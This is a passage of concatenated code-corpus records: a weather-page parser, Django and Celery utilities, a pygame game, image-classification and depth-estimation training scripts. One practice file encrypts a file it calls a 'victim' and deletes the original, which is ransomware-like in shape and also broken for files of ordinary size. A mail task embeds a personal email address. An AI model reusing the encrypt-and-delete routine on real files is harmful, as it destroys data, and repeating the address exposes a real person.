{href}')\n\n\n\n","sub_path":"HW3/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"335765240","text":"from tastypie import fields\nfrom website.apps.api import 
UT8ModelResource\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.cache import SimpleCache\nfrom website.apps.lexicon.models import Word, Lexicon\n\nclass LexiconResource(UT8ModelResource):\n\n    def determine_format(self, request):\n        return 'application/json'\n\n    class Meta:\n        queryset = Lexicon.objects.all()\n        allowed_methods = ['get']\n        excludes = []\n        cache = SimpleCache(timeout=10)\n        authorization = DjangoAuthorization()\n\n\nclass WordResource(UT8ModelResource):\n\n    def determine_format(self, request):\n        return 'application/json'\n\n    class Meta:\n        queryset = Word.objects.all()\n        allowed_methods = ['get']\n        excludes = ['comment', 'quality', ]\n        cache = SimpleCache(timeout=10)\n        detail_uri_name = 'slug'\n","sub_path":"website/website/apps/lexicon/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"438798850","text":"#open file for write\r\nf=open(\"file1.txt\",\"w\")\r\n\r\n#print (f)\r\nf.write('αβγδεζηθικλμνξοπρστ\n')\r\nf.write('υφχψω123456789');\r\n\r\n#open file for read\r\nf=open('file1.txt','r')# reads only from the file\r\n\r\n# pieces reading\r\nz=f.read()\r\nprint ('This is the file now=',z)\r\n\r\nf=open('file1.txt','r')\r\ns1=f.read(5)\r\nprint ('Read 5 items from the file=',s1)\r\ns2=f.read(19)\r\nprint ('Read the next 19 items from the file=',s2)\r\ns2=f.read(25)\r\nprint ('Read the next 25 items from the file, as many as exist=',s2)\r\nf.close()\r\n#open file for read\r\nf=open('file1.txt','r')\r\n\r\n# pieces reading\r\ns1=f.read(5)\r\nprint ('Read 5 items from the file=',s1)\r\nprint ('Read and returned the current position=',f.tell())\r\ns2=f.read(19)\r\nprint ('Read the next 19 items from the file=',s2)\r\nprint ('Read and returned the current position=',f.tell())\r\ns2=f.read(25)\r\nprint ('Read the next 25 items from the file, as many as exist=',s2)\r\nprint ('Read and returned the current position =',f.tell())\r\nf.close()\r\n\r\n# seek\r\nf=open('file1.txt','r+')# r+ reads and also writes to the file\r\nf.write('0123456789abcdef')\r\nf.seek(0)\r\nprint('************************************************************************')\r\nprint('This has been added at the start of the file=',f.read(16))\r\nf.write('0123456789abcdef')\r\nf.seek(5) # Go to the 6th byte in the file\r\nprint ('From the 5th byte on, read 2 items=',f.read(2)) \r\nf.seek(13) # Go to the 14th byte in the file\r\nprint ('From the 13th byte on, read 1 item=',f.read(1))\r\nprint('************************************************************************')\r\n#--------------------------------------------------------------------------------------------------------------------\r\n#opening and reading a file\r\nfile = open ( 'words.dat' , 'w' )\r\nword = ','\r\nwhile word != 'END' :\r\n    word = input ( 'Enter a word, you will find it in the file words.dat (type END to exit): ')\r\n    file.write ( word + ',' )\r\nfile.close ( )\r\nfile=open('words.dat','r')\r\nf=file.readlines()\r\nprint(f)\r\nfile.close()\r\n","sub_path":"python33/arxeio_listes_metrima_hmerominia/arxeio_file_kai_words.py","file_name":"arxeio_file_kai_words.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"67736634","text":"def rsa_enc(file_to_encrypt):\n    import rsa, os, re\n\n    with open(\"pub_key.txt\", \"w\") as pub, 
open(\"priv_key.txt\", \"w\") as priv:\n pub_k, priv_k = rsa.newkeys(1024)\n pub.write(str(pub_k))\n priv.write(str(priv_k))\n with open(file_to_encrypt, \"rb\") as victim, open(\"pub_key.txt\", \"r\") as pub_k, \\\n open(file_to_encrypt + \".crp\", \"wb\") as new:\n pub_k = pub_k.read()\n e = re.findall(r\"\\((\\d+)\", pub_k)[0]\n n = re.findall(r\"(\\d+)\\)\", pub_k)[0]\n new.write(rsa.encrypt(victim.read(), rsa.PublicKey(int(e), int(n))))\n os.remove(file_to_encrypt)\n\n\ndef rsa_dec(file_to_decrypt):\n import rsa, re, os\n with open(file_to_decrypt, \"rb\") as old, open(\"priv_key.txt\", \"r\") as priv_k, \\\n open(file_to_decrypt[:file_to_decrypt.rfind(\".\")], \"w\") as notvictim:\n priv_k = priv_k.read()\n e = re.findall(\"\\((\\d+)\", priv_k)[0]\n n = re.findall(\"\\, (\\d+)\", priv_k)[0]\n d = re.findall(\"\\, (\\d+)\", priv_k)[1]\n p = re.findall(\"\\, (\\d+)\", priv_k)[2]\n q = re.findall(\"\\, (\\d+)\\)\", priv_k)[0]\n notvictim.write(str(rsa.decrypt(old.read(), rsa.PrivateKey(int(e), int(n), int(d), int(p), int(q)))))\n os.remove(file_to_decrypt)\n os.remove(\"priv_key.txt\")\n os.remove(\"pub_key.txt\")\n","sub_path":"Practiсe7/rsa_cipher.py","file_name":"rsa_cipher.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293358316","text":"import re\nimport datetime\n\nfrom .abstract import Parser\nfrom ..labels import DATA_LABELS as DL\n\n\nclass WeatherlinkParser(Parser):\n\n def parse(self, content, **kwargs):\n self.content = content\n\n data = {}\n data[DL['TIME']] = self._clean_time_timestamp(self.get_timestamp())\n data[DL['DATE']] = self._clean_date_timestamp(self.get_timestamp())\n\n temperatures = self.get_temperature()\n if temperatures:\n data[DL['TEMP']] = self._clean(temperatures[0], 'temp')\n data[DL['TEMP_MAX']] = self._clean(temperatures[1], 'temp')\n data[DL['TEMP_MAX_TIME']] = self._clean(temperatures[2], 'time')\n data[DL['TEMP_MIN']] = self._clean(temperatures[3], 'temp')\n data[DL['TEMP_MIN_TIME']] = self._clean(temperatures[4], 'time')\n\n humidity = self.get_humidity()\n if humidity:\n data[DL['HUMIDITY']] = self._clean(humidity[0], 'humidity')\n data[DL['HUMIDITY_MAX']] = self._clean(humidity[1], 'humidity')\n data[DL['HUMIDITY_MAX_TIME']] = self._clean(humidity[2], 'time')\n data[DL['HUMIDITY_MIN']] = self._clean(humidity[3], 'humidity')\n data[DL['HUMIDITY_MIN_TIME']] = self._clean(humidity[4], 'time')\n\n dew = self.get_dew()\n if dew:\n data[DL['DEW']] = self._clean(dew[0], 'dew')\n data[DL['DEW_MAX']] = self._clean(dew[1], 'dew')\n data[DL['DEW_MAX_TIME']] = self._clean(dew[2], 'time')\n data[DL['DEW_MIN']] = self._clean(dew[3], 'dew')\n data[DL['DEW_MIN_TIME']] = self._clean(dew[4], 'time')\n\n pressure = self.get_pressure()\n if pressure:\n data[DL['PRESSURE']] = self._clean(pressure[0], 'pressure')\n data[DL['PRESSURE_MAX']] = self._clean(pressure[1], 'pressure')\n data[DL['PRESSURE_MAX_TIME']] = self._clean(pressure[2], 'time')\n data[DL['PRESSURE_MIN']] = self._clean(pressure[3], 'pressure')\n data[DL['PRESSURE_MIN_TIME']] = self._clean(pressure[4], 'time')\n\n wind_strength = self.get_wind_strength()\n if wind_strength:\n data[DL['WIND']] = self._clean(wind_strength[0], 'wind')\n data[DL['WIND_MAX']] = self._clean(wind_strength[1], 'wind')\n data[DL['WIND_MAX_TIME']] = self._clean(wind_strength[2], 'time')\n\n wind_dir = self.get_wind_dir()\n if wind_dir:\n data[DL['WIND_DIR']] = self._clean(wind_dir[0], 'wind_dir')\n data[DL['WIND_DIR_MAX']] = 
None # not provided\n\n rain = self.get_rain()\n if rain:\n data[DL['RAIN_RATE']] = self._clean(rain[0], 'rain')\n data[DL['RAIN']] = self._clean(rain[1], 'rain_rate')\n data[DL['RAIN_MONTH']] = self._clean(rain[2], 'float')\n data[DL['RAIN_YEAR']] = self._clean(rain[3], 'float')\n data[DL['RAIN_RATE_MAX']] = None # not provided\n data[DL['RAIN_RATE_MAX_TIME']] = None # not provided\n\n return data\n\n def get_timestamp(self):\n\n matches = re.search(\n 'Current Conditions as of (\\d+:\\d+\\s(?:[^ ]+),\\s[^ ]+\\s\\d+,\\s\\d+)', # noqa\n self.content,\n flags=re.IGNORECASE\n )\n if matches is not None:\n return matches.group(1)\n\n def _clean_time_timestamp(self, value):\n return datetime.datetime.strptime(value.strip(), '%H:%M %A, %B %d, %Y').time() # noqa\n\n def _clean_date_timestamp(self, value):\n return datetime.datetime.strptime(value.strip(), '%H:%M %A, %B %d, %Y').date() # noqa\n\n def get_temperature(self):\n\n matches = re.search(\n 'Outside Temp.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_humidity(self):\n\n matches = re.search(\n 'Outside Humidity.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)%<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_dew(self):\n\n matches = re.search(\n 'Dew Point.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)\\sC<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_pressure(self):\n\n matches = re.search(\n 'Barometer.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([\\d:]+)<.*\\n.*?>([-\\d.]+)[^<]+<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n matches.group(5),\n )\n return None\n\n def get_wind_strength(self):\n matches = re.search(\n 'Wind Speed.*\\n.*?>(.+?) 
?(km/h)?<.*\\n.*?>([-\\d.]+) km/h<.*\\n.*?>([\\d:]+)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n '0' if matches.group(1) == 'Calm' else matches.group(1),\n matches.group(3),\n matches.group(4),\n )\n return None\n\n def get_wind_dir(self):\n matches = re.search(\n 'Wind Direction.*\\n.*?>(.+?)<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n None\n )\n return None\n\n def get_rain(self):\n\n matches = re.search(\n 'Rain.*\\n.*?>([-\\d.]+)mm/Hour<.*\\n.*?>([-\\d.]+)mm<.*\\n.*?>.*?<.*\\n.*?>([-\\d.]+)mm<.*\\n.*?>([-\\d.]+)mm<', # noqa\n self.content,\n flags=re.MULTILINE\n )\n if matches is not None:\n return (\n matches.group(1),\n matches.group(2),\n matches.group(3),\n matches.group(4),\n )\n return None\n","sub_path":"torinometeo/realtime/fetch/parsers/weatherlink.py","file_name":"weatherlink.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"508332400","text":"import pygame\nimport time\nimport random\n\nfrom player import Player\nfrom coin import Coin\nfrom obstacle import Obstacle\n\nfrom functions import *\n \npygame.init()\n \ndisplay_width = 800\ndisplay_height = 600\n \n \n \nscreen = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption(\"Jetpack\")\nclock = pygame.time.Clock()\n\n\n#Load background\nbg1 = pygame.image.load(\"bg_mountains.png\").convert()\nbg2 = pygame.image.load(\"bg_mountains.png\").convert()\n\n\ndef game_loop():\n\n\tDistance = 0;\n\tcoinTotal = 0\n\t\n\t#Background variables\n\tbg1_x = 0\n\tbg2_x = bg1.get_width()\n\tbg_speed = 5\n\n\t#list of sprites\n\tplayer_sprite = pygame.sprite.Group()\n\n\tcoin_group = pygame.sprite.Group()\n\n\trocket_group = pygame.sprite.Group()\n\n\t#Initialize player called \"jet\"\n\tjet = Player()\n\tjet.rect.x = 200\n\tjet.rect.y = 300\n\n\t#add to list of all sprites\n\tplayer_sprite.add(jet)\n\n\tgameOver = False\n\n\t#initial speed of jet\n\tspeed = 0\n\n\t#Initial place of random coin\n\tnewCoinY = 300;\n\n\twhile not gameOver:\n\n\t\t#dABckgorund scrolling\n\n\t\tbg1_x = scroll_BG(screen, bg1_x, bg2_x, 1600, 1, bg1, bg2)\n\t\tbg2_x = scroll_BG(screen, bg1_x, bg2_x, 1600, 2, bg1, bg2)\n\n\t\t#display distance\n\t\t\n\t\tdistance_display(screen, Distance)\n\t\tDistance += 1\n\t\t\n\t\t#display coin total\n\t\t\n\t\tcoin_display(screen, coinTotal)\n\t\t\n\t\t#event handling\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tquit()\n\n\t\tkeys = pygame.key.get_pressed()\n\n\n\n\t\tif keys[pygame.K_UP] or keys[pygame.K_w]:\n\t\t\t\tspeed += 2\n\t\t\t\t#if hits bound reset acceleration\n\t\t\t\tif (jet.moveUp(speed, display_height)) == 1:\n\t\t\t\t\tspeed = 0\n\n\t\telse: \n\t\t\t#if not going up, apply gravity\n\t\t\tspeed -= 3\n\t\t\t#stop accelating if hits boundary\n\t\t\tif (jet.moveUp(speed, display_height)) == 1:\n\t\t\t\t\tspeed = 0\n\t\t\n\n\t\t#draw coins and rockets\n\n\t\tif (Distance % 29) == 0: \n\n\t\t\tcoin = Coin(newCoinY, 100)\n\t\t\tnewCoinY = coin.rect.y\n\t\t\tcoin_group.add(coin)\n\n\t\t\t#This next bit of code will place rocket above the coin if its in bottom half\n\t\t\t#otheriwse it will palce the rocket below the coin\n\t\tif (Distance % 37) == 0:\n\t\t\tif newCoinY < display_height/2 :\n\t\t\t\trocket = Obstacle(newCoinY+80)\n\t\t\telse:\n\t\t\t\trocket = 
Obstacle(newCoinY-80)\n\n\t\t\trocket_group.add(rocket)\n\n\n\n\n\n\t\tif (pygame.sprite.groupcollide(player_sprite, coin_group, False, True, collided = None)):\n\t\t\tcoinTotal += 10\n\n\t\tif (pygame.sprite.groupcollide(player_sprite, rocket_group, True, True, pygame.sprite.collide_mask)):\n\t\t\tgameOver = True\n\t\t\tif coinTotal > get_hi_score() :\n\t\t\t\tnew_HI = True\n\t\t\t\tsave_hi_score(coinTotal)\n\t\t\telse:\n\t\t\t\tnew_HI = False\n\n\t\t#Update all sprites\n\t\tplayer_sprite.update()\n\t\tcoin_group.update(10)\n\t\trocket_group.update(12)\n\n\n\t\t#Draw all sprites\n\t\tplayer_sprite.draw(screen)\n\t\tcoin_group.draw(screen)\n\t\trocket_group.draw(screen)\n\n\n\t\t#Update screen\n\t\tpygame.display.flip()\n\n\n\t\tclock.tick(60)\n\n\t\tif gameOver:\n\t\t\thi_score(screen, game_loop, new_HI)\n\n\n\n\ngame_intro(screen, game_loop)\npygame.quit()\nquit()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"195020575","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport smtplib\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage\nfrom django.contrib.auth.models import User\n\nfrom celery import current_app as app\nfrom celery.utils.log import get_task_logger\n\nlogger = get_task_logger(__name__)\n\n\n@app.task(name='celerymail.send_html_mail', autoretry_for=(Exception,), max_retries=3, default_retry_delay=60)\ndef send_html_mail_task(subject, content, recipient_list, filepath=None):\n logger.info('celerymail.send_html_mail - %s - %s' % (subject, recipient_list))\n try:\n msg = EmailMessage(subject, content, settings.EMAIL_HOST_USER, recipient_list)\n msg.content_subtype = \"html\"\n if filepath:\n msg.attach_file(filepath)\n msg.send()\n except smtplib.SMTPRecipientsRefused:\n user = User.objects.get(email=recipient_list[0])\n content = user.first_name + \":\" + user.email + \"邮箱有误,请修改.\"\n msg = EmailMessage(\n \"DTS用户邮箱错误\", content, settings.EMAIL_HOST_USER,\n ['lei.zhang1@100credit.com', settings.EMAIL_HOST_USER]\n )\n msg.content_subtype = \"html\"\n msg.send()\n","sub_path":"develop/DTS/celerymail/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563069363","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 2 19:16:41 2021\n\n@author: kubra\n\"\"\"\n\nimport cv2\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.style.use('ggplot')\nimport sys\nsys.path.append('../common/')\nimport os\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix, accuracy_score, classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom skimage import feature\n\n\n\ntrain_path = 'D:/proje/ICIAR2018_BACH_Challenge/patch256_thresh110_son/'\n\noutput_folder = \"output\"\n#bins for colour histogram\nbins = 32\nrandom_seed = 9 \n\n\n\ndef sift_feature(image):\n gray= cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n sift = cv2.xfeatures2d.SIFT_create()\n # Computing key points \n kp, dsc = sift.detectAndCompute(gray, None) # get keypoint and descriptor\n img = 
dsc.mean(axis=0)\n return img\n\n\nlabels = []\nfeatures = []\n# filter all the warnings\nimport warnings\nwarnings.filterwarnings('ignore')\n\ntrain_labels = os.listdir(train_path)\ntrain_labels.sort()\n\n# Iterate over the training images:\nfor typefile in train_labels:\n lesiontype = os.listdir(os.path.join(train_path,typefile))\n current_label = typefile\n for filename in lesiontype: \n imgpath = os.path.join(train_path,typefile,filename)\n image = cv2.imread(imgpath)\n print(imgpath)\n feature = sift_feature(image)\n labels.append(current_label)\n features.append(feature)\n \n\n \n\n\nprint (\"[STATUS] completed Global Feature Extraction...\")\nprint (\"[STATUS] feature vector size {}\".format(np.array(features).shape))\nprint (\"[STATUS] training Labels {}\".format(np.array(labels).shape))\n\nprint(\"one feature example:\\n\")\nprint(features[1])\nprint(\"\\n\")\nlen(features),len(labels)\n\nprint (\"[STATUS] completed Global Feature Extraction...\")\n\n# get the overall feature vector size\nprint (\"[STATUS] feature vector size {}\".format(np.array(features).shape))\n\n# get the overall training label size\nprint (\"[STATUS] training Labels {}\".format(np.array(labels).shape))\n\ntargetNames = np.unique(labels)\nle = LabelEncoder()\ntarget = le.fit_transform(labels)\nprint (\"[STATUS] training labels encoded...\")\n\n# normalize the feature vector in the range (0-1)\nscaler = MinMaxScaler(feature_range=(0, 1))\nrescaled_features = scaler.fit_transform(features)\nprint (\"[STATUS] feature vector normalized...\")\n\nprint (\"[STATUS] target labels: {}\".format(target))\nprint( \"[STATUS] target labels shape: {}\".format(target.shape))\n\nrescaled_features= np.nan_to_num(rescaled_features,0)\n\n\nmodels = []\nmodels.append(('KNN', KNeighborsClassifier(n_neighbors=7)))\nmodels.append(('RF', RandomForestClassifier(n_estimators=700, random_state=9)))\nmodels.append(('SVM', SVC(C=200,gamma=2)))\n\nresults = []\nnames = []\nscoring = \"accuracy\"\n\n(trainDataGlobal, testDataGlobal, trainLabelsGlobal, testLabelsGlobal) = train_test_split(np.array(rescaled_features),\n np.array(target),\n test_size=0.2,\n random_state=9)\nprint(\"\\n\")\nprint(\"************************************************************\")\nprint(\"K-Fold Results\")\nprint(\"************************************************************\")\nprint(\"\\n\")\n\nfor name, model in models:\n kfold = KFold(n_splits=5, random_state=9)\n cv_results = cross_val_score(model, trainDataGlobal, trainLabelsGlobal, cv=kfold, scoring=scoring)\n print(cross_val_score(model, trainDataGlobal,trainLabelsGlobal, cv=kfold, scoring=scoring))\n results.append(cv_results)\n names.append(name)\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n print(msg)\n \n \nprint(\"\\n\") \nprint(\"************************************************************\")\nprint(\"************************************************************\")\nprint(\"\\n\")\n\nfrom sklearn import metrics\nfor name, model in models:\n clf=model\n clf.fit(trainDataGlobal, trainLabelsGlobal)\n y_pred=clf.predict(testDataGlobal)\n msg = \"%s: %f \" % (name, metrics.accuracy_score(y_pred,testLabelsGlobal))\n print(msg)\n \ntarget_names = ['Benign', 'InSitu', 'Invasive', 'Normal']\nprint(classification_report(testLabelsGlobal, y_pred, target_names=target_names))\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import plot_confusion_matrix\n\nplot_confusion_matrix(clf, testDataGlobal, testLabelsGlobal) \nplt.show() ","sub_path":"Feature 
Extraction/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453966505","text":"#!/usr/bin/python\nimport json\n\nfrom django import template\nfrom ..util import aspect_ratio_percent, HAS_THUMBNAILER, get_thumbnail_shim\nfrom django.conf import settings\nregister = template.Library()\n\n\ntry:\n FLEXIBLE_IMAGE_SIZES = settings.FLEXIBLE_IMAGE_SIZES\nexcept:\n # Image sizes. These should be in size order, smallest first.\n FLEXIBLE_IMAGE_SIZES = [\n 480,\n 768,\n 1024,\n 1280,\n 1440,\n ]\n\n\n@register.inclusion_tag(\"flexible-images/flexible-image.html\", takes_context=True)\ndef flexible_image(context, src, container=\"div\", classes=\"\", alt=\"\", background_image=False):\n rv = {\n \"container\": container,\n \"classes\": classes,\n \"aspect_padding_bottom\": aspect_ratio_percent(src),\n \"alt\": alt,\n \"background_image\": background_image,\n }\n\n # We can't do any of the srcset (or JS switching fallback) if we don't\n # have a thumbnail library installed.\n if not HAS_THUMBNAILER:\n rv[\"image\"] = src\n return rv\n # For browsers that support srcset: Give them all the sizes and let the\n # browser decide what to use.\n # For ones that do not: Serve up the first image (which should be the\n # smallest), then swap it out with a larger version in JS if their device\n # merits it.\n first = True\n sizes = []\n for size in FLEXIBLE_IMAGE_SIZES:\n image = get_thumbnail_shim(src, size)\n sizes.append({\n \"url\": image.url,\n \"width\": image.width,\n \"height\": image.height,\n })\n if first:\n rv[\"image\"] = image\n first = False\n rv[\"image_sizes\"] = sizes\n rv[\"image_sizes_json\"] = json.dumps(sizes)\n return rv\n\n\n@register.inclusion_tag(\"flexible-images/images-loading.html\")\ndef flexible_image_js(selector=\".flexible-image\"):\n ctx = {\n \"selector\": selector,\n }\n return ctx\n","sub_path":"flexible_images/templatetags/flexible_images.py","file_name":"flexible_images.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535386863","text":"from argparse import ArgumentParser\nimport os\n\nimport torch\nfrom torchvision.models import densenet169\nfrom tensorboardX import SummaryWriter\nfrom torch.distributions import Normal\n\nfrom distributions import NormalWishartPrior, GaussianDiagonalMixture\n\nfrom utils.data_loading import getTrainingEvalDataKITTI, getTrainingEvalData\n\nfrom distributions.distribution_wrappers import ProbabilisticWrapper\nfrom models.unet_model import UNetModel\nfrom training.kitti_trainers import KittiNLLDistributionTrainer\nfrom training.kitti_trainers import KittiDistillationTrainer\nfrom training.kitti_trainers import KittiL1SSIMTrainer, KittiRKLTrainer\nfrom utils.model_utils import load_unet_model_from_checkpoint\nfrom utils.model_utils import _load_densenet_dict\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n description='Probabilistic Monocular Depth Estimation on KITTI'\n )\n parser.add_argument(\n '--backbone', default='densenet169',\n choices=['resnet18', 'densenet169']\n )\n parser.add_argument('--path_to_kitti', type=str)\n parser.add_argument('--path_to_csv_train', type=str)\n parser.add_argument('--path_to_csv_val', type=str)\n parser.add_argument(\n '--ood_zip_path', default='none', type=str,\n help=\"Path to zip containing ood data (for RKL training only)\"\n )\n parser.add_argument(\n 
'--checkpoint', required=True, type=str,\n help=\"Name of the folder to save model/trainer states to\"\n )\n parser.add_argument('--pretrained_path', default=None, type=str)\n parser.add_argument('--teacher_checkpoints', default=None, nargs='+')\n parser.add_argument(\n '--epochs', default=20, type=int,\n help='number of total epochs to run'\n )\n parser.add_argument('--model_type', default='gaussian', choices=[\n 'gaussian', 'nw_prior', 'l1-ssim', 'nw_prior_rkl', 'nw_end', 'hydra'\n ])\n parser.add_argument('--lr', default=1e-4)\n parser.add_argument('--warmup_steps', default=1000, type=int)\n parser.add_argument('--bs', default=8, type=int, help='batch size')\n parser.add_argument(\n '--log_dir', default=\"\", type=str,\n help='Directory to save tensorboard logs'\n )\n parser.add_argument(\n '--state_dict', default=None, type=str,\n help='Continue training from a given state dict'\n )\n parser.add_argument(\n '--targets_transform', type=str, default='scaled',\n choices=['inverse', 'scaled', 'log'],\n help=\"Type of transformation to perform with targets\"\n )\n parser.add_argument(\n '--overfit_check', dest='overfit', action='store_true', default=False,\n help=\"If true, uses a tiny subset of the whole train\"\n )\n parser.add_argument('--max_temperature', default=10.0, type=float)\n parser.add_argument('--rkl_inv_beta', default=1e-2, type=float)\n parser.add_argument('--rkl_ood_coeff', default=1.0, type=float)\n parser.add_argument('--rkl_warmup_steps', default=30000, type=int)\n parser.add_argument('--rkl_prior_beta', default=1e-2, type=float)\n args = parser.parse_args()\n\n for path in [args.checkpoint, args.path_to_kitti]:\n if not os.path.isdir(path):\n raise ValueError(\n \"Incorrect path to folder:\" + path\n )\n\n # Load model\n if args.model_type != 'hydra':\n channels = {\n 'l1-ssim': 1,\n 'gaussian': 2, 'nw_prior': 3, 'nw_prior_rkl': 3, 'nw_end': 2\n }[args.model_type]\n if args.model_type == 'hydra':\n channels = len(args.teacher_checkpoints) * 2\n if args.pretrained_path is None:\n model = UNetModel(args.backbone, out_channels=channels).cuda()\n else:\n model = UNetModel(\n args.backbone, pretrained=False, out_channels=channels\n ).cuda()\n\n loaded_densenet = densenet169(pretrained=False)\n _load_densenet_dict(loaded_densenet, args.pretrained_path)\n model.encoder.original_model = loaded_densenet.features.cuda()\n if args.model_type == 'nw_prior_rkl':\n # Adjust L and \\beta initialization for RKL\n model.decoder.conv3.weight[0].data.mul_(10)\n model.decoder.conv3.weight[1].data.mul_(0.001)\n model = torch.nn.DataParallel(model)\n if args.model_type == 'gaussian' or args.model_type == 'nw_end':\n model = ProbabilisticWrapper(Normal, model)\n elif 'nw' in args.model_type:\n model = ProbabilisticWrapper(\n NormalWishartPrior, model\n )\n elif args.model_type == 'hydra':\n model = ProbabilisticWrapper(\n GaussianDiagonalMixture, model\n )\n print(\"Model created\")\n\n if args.teacher_checkpoints is not None:\n teacher_model = load_unet_model_from_checkpoint(\n args.teacher_checkpoints, \"gaussian-ensemble\", args.backbone\n )\n\n logdir = args.log_dir\n if logdir == '':\n logdir = 'logs/' + '{}-lr{}-e{}-bs{}'.format(\n args.backbone, args.lr, args.epochs, args.bs\n )\n\n # Create trainer\n if args.model_type == 'l1-ssim':\n print(\"Training with original loss\")\n trainer_cls = KittiL1SSIMTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n }\n )\n elif 
args.model_type == 'gaussian':\n print(\"Training with NLL objective\")\n trainer_cls = KittiNLLDistributionTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n },\n additional_params={'targets_transform': args.targets_transform}\n )\n elif args.teacher_checkpoints is not None:\n if args.model_type == 'nw_end':\n print(\"Distilling with pairwise kl divergence\")\n elif args.model_type == 'hydra':\n print(\"Distilling into multiple heads simultaneously\")\n else:\n print(\"Distilling with log prob\")\n max_T = args.max_temperature\n trainer_cls = KittiDistillationTrainer(\n teacher_model, max_T,\n model, torch.optim.Adam, SummaryWriter, logdir,\n args.epochs, {'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps},\n additional_params={'targets_transform': args.targets_transform}\n )\n else:\n print(\"Performing RKL training with custom OOD data\")\n ood_loader, _ = getTrainingEvalData(\n path=args.ood_zip_path, batch_size=args.bs,\n sanity_check=args.overfit, is_ood=True, indata='kitti'\n )\n trainer_cls = KittiRKLTrainer(\n model, torch.optim.Adam, SummaryWriter, logdir,\n epochs=args.epochs, optimizer_args={\n 'lr': args.lr, 'amsgrad': True, 'warmup_steps': args.warmup_steps\n },\n additional_params={\n 'targets_transform': args.targets_transform,\n 'inv_real_beta': args.rkl_inv_beta,\n 'ood_coeff': args.rkl_ood_coeff,\n 'prior_beta': args.rkl_prior_beta,\n \"ood_coeff_warmup\": args.rkl_warmup_steps\n }\n )\n print(\"Trainer created\")\n\n # Load data\n train_loader, val_loader = getTrainingEvalDataKITTI(\n path_to_kitti=args.path_to_kitti,\n path_to_csv_train=args.path_to_csv_train,\n path_to_csv_val=args.path_to_csv_val,\n batch_size=args.bs,\n )\n print(\"Data loaded\")\n\n print(\"Training...\")\n if args.model_type == 'nw_prior_rkl':\n trainer_cls.train(\n train_loader, val_loader, ood_loader,\n args.checkpoint, args.state_dict\n )\n else:\n trainer_cls.train(\n train_loader, val_loader, args.checkpoint, args.state_dict\n 